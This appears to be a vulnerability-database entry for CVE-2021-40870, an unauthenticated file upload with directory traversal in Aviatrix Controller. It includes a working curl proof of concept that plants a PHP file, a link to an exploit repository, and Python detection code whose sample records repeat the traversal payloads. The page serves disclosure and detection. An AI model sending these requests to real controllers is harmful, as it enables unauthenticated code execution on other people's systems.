
CVE-2021-40870

Description

An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.

**Recent assessments:**

**JoyGhoshs** at October 09, 2021 6:33am UTC reported:

### Description

This vulnerability allows an attacker to create and store a file on the Aviatrix controller. The exploitation phase doesn't need any user authentication or require any other user's interaction; it can simply be exploited using curl. Here is one example.

```
curl -k https://aviatrix.domain.tld/v1/backend1 \
  -d CID=x \
  -d action=set_metric_gw_selections \
  -d account_name=/../../../var/www/php/poc.php \
  -d 'data=hello<?php echo "Vulnerable Poc";?>'
# after executing the previous command, if the target is vulnerable, this will create a php file on this path: https://vulnerable.target.com/v1/poc
```

An attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem.

Or you can use this exploit to do the exploitation more easily: <https://github.com/JoyGhoshs/CVE-2021-40870>

![Exploitation](https://i.ibb.co/2vwq3TS/Screenshot-20211009-123757.png)

Assessed Attacker Value: 3
Assessed Attacker Value: 5
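Added example (not part of the original entry or the assessment): detection logic for the request pattern described above, run over constructed proxy/WAF records. It assumes a log source that captures POST bodies; the record fields (`src`, `method`, `url`, `body`) and the sample hosts are hypothetical, and the normalized path is derived from the parameter value alone, not from the controller's real base directory.

```python
from urllib.parse import parse_qsl, unquote, urlsplit
import posixpath

API_PATH = "/v1/backend1"        # endpoint named in the assessment
WATCHED_PARAM = "account_name"   # parameter that carried the traversal

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def is_traversal(value):
    """An account name should be a plain token: no separators, dot parts or NUL."""
    v = fully_decode(value)
    return "/" in v or "\x00" in v or v in (".", "..")

def inspect(record):
    """Return a finding for a suspicious request to the API, else None."""
    if record["method"] != "POST" or urlsplit(record["url"]).path != API_PATH:
        return None
    params = dict(parse_qsl(record["body"], keep_blank_values=True))
    name = params.get(WATCHED_PARAM, "")
    if not is_traversal(name):
        return None
    normalized = posixpath.normpath(fully_decode(name))
    return {"src": record["src"], "action": params.get("action"),
            "normalized": normalized,
            "script": normalized.lower().endswith((".php", ".phtml"))}

def scan(records):
    return [f for f in map(inspect, records) if f]

# Constructed sample records (hosts and addresses are documentation values).
URL = "https://controller.example/v1/backend1"
SAMPLE = [
    {"src": "203.0.113.7", "method": "POST", "url": URL, "body":
     "CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/poc.php&data=x"},
    {"src": "203.0.113.7", "method": "POST", "url": URL, "body":
     "CID=x&action=set_metric_gw_selections&account_name=%252e%252e%252fvar%252fwww%252fphp%252fa.php&data=x"},
    {"src": "198.51.100.20", "method": "POST", "url": URL, "body":
     "CID=abc123&action=set_metric_gw_selections&account_name=prod-aws&data=x"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with `script` set to true means the decoded `account_name` points at a PHP file name, which matches the arbitrary file creation described in the entry.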

